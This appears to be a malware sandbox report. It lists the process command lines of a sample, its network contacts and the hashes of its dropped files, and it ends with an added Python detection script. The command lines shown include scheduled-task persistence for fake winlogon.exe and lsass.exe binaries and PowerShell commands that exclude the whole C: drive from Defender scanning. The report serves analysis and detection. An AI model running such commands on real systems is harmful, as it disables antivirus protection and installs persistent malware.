C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "winlogonw" /sc MINUTE /mo 12 /tr "'C:\Program Files (x86)\Google\Temp\winlogon.exe'" /f
C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "winlogon" /sc ONLOGON /tr "'C:\Program Files (x86)\Google\Temp\winlogon.exe'" /rl HIGHEST /f
C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "winlogonw" /sc MINUTE /mo 11 /tr "'C:\Program Files (x86)\Google\Temp\winlogon.exe'" /rl HIGHEST /f
C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "SearchAppS" /sc MINUTE /mo 7 /tr "'C:\Recovery\WindowsRE\SearchApp.exe'" /f
C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "SearchApp" /sc ONLOGON /tr "'C:\Recovery\WindowsRE\SearchApp.exe'" /rl HIGHEST /f
C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "SearchAppS" /sc MINUTE /mo 8 /tr "'C:\Recovery\WindowsRE\SearchApp.exe'" /rl HIGHEST /f
C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "unsecappu" /sc MINUTE /mo 13 /tr "'C:\Users\Default User\unsecapp.exe'" /f
C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "unsecapp" /sc ONLOGON /tr "'C:\Users\Default User\unsecapp.exe'" /rl HIGHEST /f
C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "unsecappu" /sc MINUTE /mo 7 /tr "'C:\Users\Default User\unsecapp.exe'" /rl HIGHEST /f
C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "lsassl" /sc MINUTE /mo 12 /tr "'C:\Program Files\Windows Multimedia Platform\lsass.exe'" /f
C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "lsass" /sc ONLOGON /tr "'C:\Program Files\Windows Multimedia Platform\lsass.exe'" /rl HIGHEST /f
C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "lsassl" /sc MINUTE /mo 11 /tr "'C:\Program Files\Windows Multimedia Platform\lsass.exe'" /rl HIGHEST /f
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"powershell" -Command Add-MpPreference -ExclusionPath 'C:/'
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"powershell" -Command Add-MpPreference -ExclusionPath 'C:/$Recycle.Bin/'
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"powershell" -Command Add-MpPreference -ExclusionPath 'C:/Documents and Settings/'
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"powershell" -Command Add-MpPreference -ExclusionPath 'C:/DriverHostCrtNet/'
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"powershell" -Command Add-MpPreference -ExclusionPath 'C:/PerfLogs/'
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"powershell" -Command Add-MpPreference -ExclusionPath 'C:/Program Files/'
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"powershell" -Command Add-MpPreference -ExclusionPath 'C:/Program Files (x86)/'
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"powershell" -Command Add-MpPreference -ExclusionPath 'C:/ProgramData/'
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"powershell" -Command Add-MpPreference -ExclusionPath 'C:/Recovery/'
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"powershell" -Command Add-MpPreference -ExclusionPath 'C:/System Volume Information/'
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"powershell" -Command Add-MpPreference -ExclusionPath 'C:/Users/'
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"powershell" -Command Add-MpPreference -ExclusionPath 'C:/Windows/'
C:\DriverHostCrtNet\System.exe
"C:\DriverHostCrtNet\System.exe"
C:\Windows\System32\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\41a9a8e6-06e8-42ac-bf79-d2643ae41989.vbs"
C:\Windows\System32\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\09dcb6ba-2fbe-4e02-acba-0a7b176ef713.vbs"
C:\DriverHostCrtNet\System.exe
C:\DriverHostCrtNet\System.exe
Network
| Country | Destination | Domain | Proto |
|---|---|---|---|
| US | 8.8.8.8:53 | 149.220.183.52.in-addr.arpa | udp |
| US | 8.8.8.8:53 | bitbucket.org | udp |
| GB | 185.166.141.8:443 | bitbucket.org | tcp |
| US | 8.8.8.8:53 | 8.141.166.185.in-addr.arpa | udp |
| US | 8.8.8.8:53 | g.bing.com | udp |
| US | 13.107.21.237:443 | g.bing.com | tcp |
| US | 8.8.8.8:53 | 72.32.126.40.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 237.21.107.13.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 58.55.71.13.in-addr.arpa | udp |
| PL | 95.214.53.31:80 | 95.214.53.31 | tcp |
| US | 8.8.8.8:53 | 31.53.214.95.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 183.59.114.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 206.23.85.13.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 147.142.123.92.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 73.144.22.2.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 13.227.111.52.in-addr.arpa | udp |
| US | 8.8.8.8:53 | tse1.mm.bing.net | udp |
| US | 150.171.27.10:443 | tse1.mm.bing.net | tcp |
| US | 150.171.27.10:443 | tse1.mm.bing.net | tcp |
| US | 150.171.27.10:443 | tse1.mm.bing.net | tcp |
| US | 150.171.27.10:443 | tse1.mm.bing.net | tcp |
| US | 150.171.27.10:443 | tse1.mm.bing.net | tcp |
| US | 8.8.8.8:53 | 10.27.171.150.in-addr.arpa | udp |
Files
memory/4304-0-0x00007FF8334D3000-0x00007FF8334D5000-memory.dmp
memory/4304-1-0x0000000000B80000-0x0000000000BAE000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_qoxjkbk4.f15.ps1
| MD5 | d17fe0a3f47be24a6453e9ef58c94641 |
| SHA1 | 6ab83620379fc69f80c0242105ddffd7d98d5d9d |
| SHA256 | 96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7 |
| SHA512 | 5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82 |
memory/1664-12-0x0000022EE1350000-0x0000022EE1372000-memory.dmp
memory/1664-13-0x00007FF8334D0000-0x00007FF833F91000-memory.dmp
memory/1664-14-0x00007FF8334D0000-0x00007FF833F91000-memory.dmp
memory/1664-15-0x00007FF8334D0000-0x00007FF833F91000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\ft.exe
| MD5 | e84cc0620cc96970d2e1a8d0017000a6 |
| SHA1 | 3e06e2f55642880f6b3738f462a60bc4d84f68ba |
| SHA256 | 17df34146d3c1442f4b303e9536dd207424eb4d07d90a54f8b4cef20f40d43a8 |
| SHA512 | d902fa5eed92eafc6f11f2a5d3e49020948e6c152d5c34a09c6d42b47ec2319da4ee5f63f38dd658da3f846e9495ad93ae3f9cfa834d827a59e9bc3ce5bd10f0 |
C:\Users\Admin\AppData\Local\Temp\Tor.exe
| MD5 | e235a410c3e0c9432f755940e7d5ac61 |
| SHA1 | b94f875771c83acbcdcd3c788dc8002eaf91438f |
| SHA256 | a77e85defe720361ffa22bc96fe3c82366c3ef61dd931bdf0e0326aa984a33b3 |
| SHA512 | 6d3c3650441b48e37ca1352d9f38a66a6376741439db8efc9f765de5df7506400e5ea5174d28734e2876889f242bc9ab7e8e5013c18575b5ccb7493bd8e2b33f |
memory/1664-41-0x00007FF8334D0000-0x00007FF833F91000-memory.dmp
C:\DriverHostCrtNet\KNpp6xs8D.vbe
| MD5 | a9feb4bb422aae9305d1c9d7c223dce5 |
| SHA1 | a4e983d8f1b7b21b9edc1fbbe358ea67dc38cf37 |
| SHA256 | 22851b07f5b85a7cd0992b1593b973b9e29af03733dd0a86284f0c759bbc2201 |
| SHA512 | da6a69df2fc09304c97979b51027971636328f01bd69dcab955395acf64e1f0c6c9a6aa9fe77d4d53f7fd16146acd332650f3d00cfd8664b6304ef719cbe4255 |
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
| MD5 | e1d7973fb9071815b4241da5ec0dfb6a |
| SHA1 | 41f06afbd0ac9f9a0b226a2dd6fa9495d83209b9 |
| SHA256 | b3953ac9f5752d996ec2545864d6ccf09ffe4b0f84f41a2cc52a95ad8103212b |
| SHA512 | 66163114aba8867561ceac2124bc2060c351cb4a83c4f8d40bc6bfd8042881690ea8152e2b58ec55b4b6de17e1610642c90df602e1fb2658b4c3d0783f3a0900 |
C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log
| MD5 | 223bd4ae02766ddc32e6145fd1a29301 |
| SHA1 | 900cfd6526d7e33fb4039a1cc2790ea049bc2c5b |
| SHA256 | 1022ec2fed08ff473817fc53893e192a8e33e6a16f3d2c8cb6fd37f49c938e1e |
| SHA512 | 648cd3f8a89a18128d2b1bf960835e087a74cdbc783dbfcc712b3cb9e3a2e4f715e534ba2ef81d89af8f60d4882f6859373248c875ceb26ad0922e891f2e74cc |
C:\DriverHostCrtNet\unV39Cxd.bat
| MD5 | 39e72d40a9ddaaf86994f941af3f7465 |
| SHA1 | e4b7c6d895cb2ce60391ab1a4363425868b63204 |
| SHA256 | 4482b48de5d1a8c39b59f5293ddc7bbcba2af31ff77ebc02e48b68c6a68b0fae |
| SHA512 | beb0761aaca17016bd7def46956b006f201885f24b1ecce29e75b65199f9196a3cb2461b79734e49f8a2328647f3ae2e741b8afb52d7857d429b0a7b0ef0f4a1 |
C:\DriverHostCrtNet\comSvc.exe
| MD5 | 08278eef0c4511e2cbfce76266dd90f2 |
| SHA1 | 9dd9dee2b7b3b19a6e8271ee443b79bb64eb288b |
| SHA256 | f9313b93b7c392002e914e4e6af21eb8f5e25f86c37803c64e84ae8d228f2f03 |
| SHA512 | 3e5fb401eafb8ddce42fd9bbbd23783941d7540e20edba98fe67e05871d72ac8c89e5a8a5254bc9db62cc74fae596b3c86785650e075e8a1d5b25651d90cadd0 |
memory/4404-67-0x0000000000150000-0x0000000000306000-memory.dmp
memory/4404-69-0x000000001AF30000-0x000000001AF4C000-memory.dmp
memory/4404-70-0x000000001AFA0000-0x000000001AFF0000-memory.dmp
memory/4404-74-0x000000001AF50000-0x000000001AF66000-memory.dmp
memory/4404-75-0x000000001AF70000-0x000000001AF82000-memory.dmp
memory/4404-73-0x0000000002540000-0x0000000002550000-memory.dmp
memory/4404-72-0x0000000002420000-0x0000000002428000-memory.dmp
memory/4404-77-0x000000001AF90000-0x000000001AFA0000-memory.dmp
memory/4404-78-0x000000001AF80000-0x000000001AF8C000-memory.dmp
memory/4404-82-0x000000001B710000-0x000000001B71C000-memory.dmp
C:\Windows\System32\drivers\etc\hosts
| MD5 | 7a47afdf68d97d678987c9d60eab9086 |
| SHA1 | 1e03088721b6c7d0aab59e80f12238837793f051 |
| SHA256 | 860d78899a84ae7c858183ff0eab215ee0f36febfdfd766a2fb6d429895da669 |
| SHA512 | 9dc0cbcefc921689582ed163c767c7c0b681236d499cf962ade0415a2b0fcd7d501e682a0ea3c385f7d039d3de94bb0b40c001851b1dd4c0d05c7fb26b65881c |
memory/4404-79-0x000000001B700000-0x000000001B708000-memory.dmp
memory/4404-86-0x000000001B950000-0x000000001B95C000-memory.dmp
memory/4404-87-0x000000001B960000-0x000000001B96C000-memory.dmp
memory/4404-85-0x000000001B840000-0x000000001B848000-memory.dmp
memory/4404-84-0x000000001B830000-0x000000001B83A000-memory.dmp
memory/4404-83-0x000000001B820000-0x000000001B82C000-memory.dmp
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
| MD5 | 4cb59d549e8c5d613ea4b7524088528a |
| SHA1 | 5bdfb9bc4920177a9e5d4b9c93df65383353ab22 |
| SHA256 | a4ac74b80eadcb876402dc2842d706a249691176dd838a6100a8c26bfa87811a |
| SHA512 | a9f5bde138142665e056b1e2f40c16cff0c9a6a6907f038c4685275df66ceea39d9fca9a1c72529b2287632e0669346efb06ff302b0199764cca45b23faa4b52 |
memory/4876-115-0x00007FF61D540000-0x00007FF61D944000-memory.dmp
C:\Program Files\Java\jre-1.8\lib\images\cursors\RCXE600.tmp
| MD5 | dbfa087e264beffa3a0247b3a5989aa5 |
| SHA1 | f1fc7b83a480cc49d17d7a91f92e2bef54ae4048 |
| SHA256 | 5d59ce562d799c6e0ce33d30ad5095c7432cd71ce66f4594377e28ae3a031533 |
| SHA512 | 198b3cab56b8c38d4bac0b4fcb7e995e7a4eaf64432a35f268a6d135ffe91d3dd2fcd3c1f0b7d38b993dc5aacc0c07d70c21a46d7dfcd4ecc1b96bcfba80dda2 |
C:\DriverHostCrtNet\System.exe
| MD5 | 19fc528bbada6d55a39b464c300a110e |
| SHA1 | 4016abebf8f049737e2091dd743c15ff3fa96a73 |
| SHA256 | fd5275c55a974d4078eb7de59aa72ce412ac8bcb6c8249b213fea1e0df329d0f |
| SHA512 | 41ae828bde4fe58fc970cf281b866f9bb4cf2ec1e2e835505ec65b041e134bd9adf9977fe85837a0921668c2cd8fe9fedd30b208c986b51e99c4864c33f02d03 |
C:\Program Files (x86)\Google\Update\1.3.36.371\RCXF4C0.tmp
| MD5 | db580349ff4238ccf1b33aac144c28ed |
| SHA1 | 2c97445c6c90307879e606da60a9bdcfac9d0a1f |
| SHA256 | fd94d60527fc981979b222e23e368131e5e1d21cbb53fd71aa67684a308eb46f |
| SHA512 | e8f1fe0dc62c7061ea2fd8f152a6347b882185a738e31883eb75fe140230b7f64bd9d51ed9af8df2850077c540579430b761f9b00f7645fc4364d9c09127b711 |
C:\Program Files (x86)\Google\Temp\winlogon.exe
| MD5 | 140ab2669f87f619d65359606c22f762 |
| SHA1 | 021da66ad7962c4ac2ff0a05f0f424d1488a6efe |
| SHA256 | 230b332f94351c501872b63e997a5f3a458e6f914835e85bfbf92ee7b1caad8b |
| SHA512 | 4bd5602f850c4b33729a4789fa4540d601e76d9608da0fed16fa6b2573981ea87342f93f2c57aa145ecd63ccfe912c960eb245eb34833f3809892ac07c94857b |
C:\Program Files\Windows Multimedia Platform\lsass.exe
| MD5 | e3c6c535f8752fd171107b16aeea7e17 |
| SHA1 | 32acd7d8666b85ae37f3d0e49a68bead46f5e81c |
| SHA256 | a1ee8260f0ddb99fd706b31df2d201373b0e938c292eb8b02c56ada04d3d14fd |
| SHA512 | 5516a4ae426ac4fa1654e83bf2255c7d94061aec51ca89c479796777d3633cf93536072e6c028afe1e9dc8e0aa6f447b3bee4d602835d2216b988e016e66e717 |
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
| MD5 | 5b9a7ee9a9286faef39bbe9cac042fd4 |
| SHA1 | cb3ef3c9e19781c45ffd9e2902e5b0ed38c0e2c3 |
| SHA256 | a6d5d07c333b6a68534ebc0ee23ea49e77a67f26597e4bd5bcc8dfd216e6a348 |
| SHA512 | ea14a4932134952864bd1b0ccdfd6ad45ed650a9bc52589f6d21fc4382a6237c6bbce1c016482b4a68cd609dadea234726927ba0f26e9443a6b970209281f450 |
memory/3320-450-0x0000000000440000-0x00000000005F6000-memory.dmp
memory/3320-451-0x000000001B170000-0x000000001B182000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\41a9a8e6-06e8-42ac-bf79-d2643ae41989.vbs
| MD5 | d5fd9d27d73330bf57ded1888870d647 |
| SHA1 | 8a97cd2488b3e6a3c630fd38de221f3a399d36b4 |
| SHA256 | 8b2b064865036539bbcc1f94caaa6f9eb94b81cc9589e06b55cd19ae8c4e00df |
| SHA512 | dfaa890f12484ebc19e4956bf7d0eff449f42da756392095721307288c24b438655b81ee6cc5d7f9cccf5ed1958e9d59ba5c56bd490fb380b300be3516b1ef86 |
C:\Users\Admin\AppData\Local\Temp\09dcb6ba-2fbe-4e02-acba-0a7b176ef713.vbs
| MD5 | 68a095c7021a6ccc4d3a17d93f9e86bd |
| SHA1 | 0f6ea77ee95e3bba5a67a266d2f2e2a6df9bc3ce |
| SHA256 | 4744ed0a3de93248e8a4c3ce9e8f133387a8ccf437c5b57bb18dd99723f1b4f5 |
| SHA512 | b33abc8b188040b6c89c3f2310a20d0980cf08bbf2c5a479a82af39cf52119525d3fbcba2ca7ea2193bff35655f2cfdf5211fa6cd79624912876ed918e186f28 |
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
| MD5 | cadef9abd087803c630df65264a6c81c |
| SHA1 | babbf3636c347c8727c35f3eef2ee643dbcc4bd2 |
| SHA256 | cce65b73cdfe9304bcd5207913e8b60fb69faa20cd3b684f2b0343b755b99438 |
| SHA512 | 7278aa87124abb382d9024a645e881e7b7cf1b84e8894943b36e018dbf0399e6858392f77980b599fa5488e2e21bf757a0702fe6419417edac93b68e0c2ec085 |
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
| MD5 | 2e907f77659a6601fcc408274894da2e |
| SHA1 | 9f5b72abef1cd7145bf37547cdb1b9254b4efe9d |
| SHA256 | 385da35673330e21ac02545220552fe301fe54dedefbdafc097ac4342a295233 |
| SHA512 | 34fa0fff24f6550f55f828541aaefe5d75c86f8f0842d54b50065e9746f9662bb7209c74c9a9571540b9855bb3851f01db613190024e89b198d485bb5dc07721 |
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
| MD5 | bd5940f08d0be56e65e5f2aaf47c538e |
| SHA1 | d7e31b87866e5e383ab5499da64aba50f03e8443 |
| SHA256 | 2d2f364c75bd2897504249f42cdf1d19374f5230aad68fa9154ea3d03e3031a6 |
| SHA512 | c34d10c7e07da44a180fae9889b61f08903aa84e8ddfa80c31c272b1ef9d491b8cec6b8a4c836c3cb1583fe8f4955c6a8db872515de3a9e10eae09610c959406 |
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
| MD5 | e243a38635ff9a06c87c2a61a2200656 |
| SHA1 | ecd95ed5bf1a9fbe96a8448fc2814a0210fa2afc |
| SHA256 | af5782703f3f2d5a29fb313dae6680a64134db26064d4a321a3f23b75f6ca00f |
| SHA512 | 4418957a1b10eee44cf270c81816ae707352411c4f5ac14b6b61ab537c91480e24e0a0a2c276a6291081b4984c123cf673a45dcedb0ceeef682054ba0fc19cb4 |
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
| MD5 | e8ce785f8ccc6d202d56fefc59764945 |
| SHA1 | ca032c62ddc5e0f26d84eff9895eb87f14e15960 |
| SHA256 | d85c19fc6b9d25e2168a2cc50ff38bd226fbf4f02aa7ac038a5f319522d2ffa4 |
| SHA512 | 66460aec4afee582556270f8ee6048d130a090f1c12a2632ed71a99a4073e9931e9e1cc286e32debffb95a90bd955f0f0d6ec891b1c5cd2f0aae41eb6d25832f |
C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\System.exe.log
| MD5 | 3ad9a5252966a3ab5b1b3222424717be |
| SHA1 | 5397522c86c74ddbfb2585b9613c794f4b4c3410 |
| SHA256 | 27525f5fc7871c6828ab5173315e95b5c7e918d2ee532781c562c378584b5249 |
| SHA512 | b1a745f7a0f33b777ffc34f74f42752144d9f2d06b8bc613e703570494762b3af87e153212c3274b18af14f17b8619e2f350b7c3cc11228f7d4208d4251e90e6 |
memory/5280-487-0x0000000001970000-0x0000000001982000-memory.dmp
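The process list above shows eight consecutive `Add-MpPreference -ExclusionPath` calls that together exclude every top-level directory on `C:` from Defender scanning, and the file list shows the persisted copies named after core Windows binaries (`winlogon.exe` under `Google\Temp`, `lsass.exe` under `Windows Multimedia Platform`, `System.exe` under `C:\DriverHostCrtNet`). The following detection logic is an added example written for this page; it is not code from the sandbox or from the report. It runs over a constructed batch of process-creation events modelled on those command lines and image paths (the PIDs, the benign `C:\Tools\build\cache` exclusion and the real `System32\lsass.exe` control are made up), and flags (a) any exclusion at drive-root depth one or less, (b) a parent that adds three or more such exclusions, which is the sweep pattern seen here, and (c) a system-binary name running from outside `System32`/`SysWOW64`. The depth and count thresholds are assumptions to tune per environment.

```python
import re
from collections import defaultdict
from pathlib import PureWindowsPath

# Constructed sample events (not real telemetry), modelled on the command lines and
# dropped files listed in this report. PIDs and the two benign controls are made up.
POWERSHELL = r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"
SWEPT_DIRS = ["C:/PerfLogs/", "C:/Program Files/", "C:/Program Files (x86)/", "C:/ProgramData/",
              "C:/Recovery/", "C:/System Volume Information/", "C:/Users/", "C:/Windows/"]
EVENTS = [
    {"ppid": 4404, "image": POWERSHELL,
     "cmdline": f"\"powershell\" -Command Add-MpPreference -ExclusionPath '{d}'"}
    for d in SWEPT_DIRS
] + [
    # Deep, single exclusion of the kind an admin might add legitimately (assumed benign control).
    {"ppid": 7, "image": POWERSHELL,
     "cmdline": "powershell -Command Add-MpPreference -ExclusionPath 'C:\\Tools\\build\\cache'"},
    {"ppid": 4404, "image": r"C:\DriverHostCrtNet\System.exe",
     "cmdline": r'"C:\DriverHostCrtNet\System.exe"'},
    {"ppid": 3320, "image": r"C:\Program Files (x86)\Google\Temp\winlogon.exe", "cmdline": "winlogon.exe"},
    {"ppid": 3320, "image": r"C:\Program Files\Windows Multimedia Platform\lsass.exe", "cmdline": "lsass.exe"},
    {"ppid": 4, "image": r"C:\Windows\System32\lsass.exe", "cmdline": "lsass.exe"},  # genuine, must not fire
]

# Matches the path argument of Add-MpPreference -ExclusionPath, quoted or not.
EXCLUSION_RE = re.compile(
    r"Add-MpPreference\s+-ExclusionPath\s+(['\"]?)([^'\"]+?)\1(?:\s|$)", re.IGNORECASE)

BROAD_DEPTH = 1          # assumption: anything at or above one level below the drive root is "broad"
SWEEP_THRESHOLD = 3      # assumption: three or more broad exclusions from one parent is a sweep

# Names of core Windows processes that only ever run from these directories.
SYSTEM_BINARIES = {"lsass.exe", "winlogon.exe", "csrss.exe", "services.exe",
                   "smss.exe", "wininit.exe", "svchost.exe"}
EXPECTED_DIRS = {r"c:\windows\system32", r"c:\windows\syswow64"}


def exclusion_path(cmdline: str):
    """Return the excluded path in Windows form (forward slashes and trailing
    separators normalised), or None if the command line is not an exclusion add."""
    m = EXCLUSION_RE.search(cmdline)
    return str(PureWindowsPath(m.group(2))) if m else None


def path_depth(path: str) -> int:
    """Number of path components below the drive anchor: C:\\ is 0, C:\\Users is 1."""
    p = PureWindowsPath(path)
    return len(p.parts) - (1 if p.anchor else 0)


def find_broad_exclusions(events):
    """(ppid, path) for every exclusion add whose path is at or above BROAD_DEPTH."""
    hits = []
    for ev in events:
        path = exclusion_path(ev["cmdline"])
        if path is not None and path_depth(path) <= BROAD_DEPTH:
            hits.append((ev["ppid"], path))
    return hits


def find_exclusion_sweeps(events, threshold=SWEEP_THRESHOLD):
    """Parents that added `threshold` or more distinct broad exclusions: ppid -> set of paths."""
    by_parent = defaultdict(set)
    for ppid, path in find_broad_exclusions(events):
        by_parent[ppid].add(path)
    return {ppid: paths for ppid, paths in by_parent.items() if len(paths) >= threshold}


def is_masquerading(image: str) -> bool:
    """True when a core system binary name runs from a directory it never lives in."""
    p = PureWindowsPath(image)
    name = p.name.lower()
    if name == "system.exe":
        # "System" is the kernel process and has no image on disk; any System.exe is suspect.
        return True
    return name in SYSTEM_BINARIES and str(p.parent).lower() not in EXPECTED_DIRS


def find_masquerading(events):
    """Image paths, in event order, that satisfy is_masquerading."""
    return [ev["image"] for ev in events if is_masquerading(ev["image"])]


if __name__ == "__main__":
    for ppid, paths in find_exclusion_sweeps(EVENTS).items():
        print(f"exclusion sweep from ppid {ppid}: {sorted(paths)}")
    for image in find_masquerading(EVENTS):
        print(f"system-binary name outside System32: {image}")
```

On a live host the same normalisation can be applied to `(Get-MpPreference).ExclusionPath` to audit what has already been excluded; Defender also records each exclusion change as event 5007 in the `Microsoft-Windows-Windows Defender/Operational` log, which is the durable record once the PowerShell process is gone.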